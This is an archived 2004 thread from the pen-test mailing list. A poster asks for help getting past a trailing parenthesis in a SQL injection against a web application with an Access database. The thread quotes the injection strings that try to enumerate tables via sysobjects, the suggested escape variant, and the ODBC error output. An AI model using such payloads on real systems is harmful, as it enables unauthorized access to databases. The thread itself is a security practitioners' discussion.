Penetration Testing mailing list archives
Fwd: RE: SQL-Injection escape ')'
From: Strcpy <elite_netbios () yahoo com>
Date: Mon, 5 Jul 2004 00:11:10 -0700 (PDT)
I tried "/" too , nothing new :-/ it`s goeing odd. while useing the string : A'\) select name from sysobjects where xtype='U'-- I get the " extra ) " error message wich is correct: [Microsoft][ODBC Microsoft Access Driver] Extra ) in query expression 'city_name='Tehran' and (agency_english ='A'\) select name from sysobjects where xtype='U'--')'. and when I try to remove that extra ")" , and bypass the ')' , problem re-appear : [Microsoft][ODBC Microsoft Access Driver] Extra ) in query expression 'city_name='Tehran' and (agency_english ='A'\) select name from sysobjects where xtype='U' while ')'=')'. Still looking for your help. ANY comment is appriciated. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
--- Begin Message --- From: "Esmat, Ayman (ISS Middle East)" <AEsmat () iss net>
Date: Mon, 5 Jul 2004 07:54:41 +0200
Hi, We used to put '\' before using the special-characters. Try this: A'\) select name from sysobjects where xtype='U'-- -----Original Message----- From: Strcpy [mailto:elite_netbios () yahoo com] Sent: Saturday, July 03, 2004 5:46 PM To: pen-test () securityfocus com Subject: SQL-Injection escape ')' Hi list . I`m working on a web-application for vulnerability assesments in order to complete a pen-test job. there is a vulnerable query there but I can`t escape it ad use it to go farther . the page script add a ')' to end of query string always. I tried to pass it by useing # or -- or ')'=')' at the end of my query strings , but non worked :/ here is an example : i sent this : A') select name from sysobjects where xtype='U'-- [Microsoft][ODBC Microsoft Access Driver] Syntax error. in query expression 'city_name='Tehran' and (agency_english ='A') select name from sysobjects where xtype='U'--')' would you mind please help me ? [sorry for poor English] thnq all __________________________________ Do you Yahoo!? Yahoo! Mail - 50x more storage than other providers! http://promotions.yahoo.com/new_mail
--- End Message ---
Current thread:
- SQL-Injection escape ')' Strcpy (Jul 04)
- Re: SQL-Injection escape ')' Fabrice MARIE (Jul 05)
- Re: SQL-Injection escape ')' Thor (Jul 05)
- Re: SQL-Injection escape ')' nummish (Jul 05)
- Re: SQL-Injection escape ')' Roman Medina (Jul 06)
- <Possible follow-ups>
- Fwd: RE: SQL-Injection escape ')' Strcpy (Jul 05)
- Fwd: RE: SQL-Injection escape ')' Strcpy (Jul 05)
- Re: SQL-Injection escape ')' Strcpy (Jul 05)
- RE: SQL-Injection escape ')' Esmat, Ayman (ISS Middle East) (Jul 05)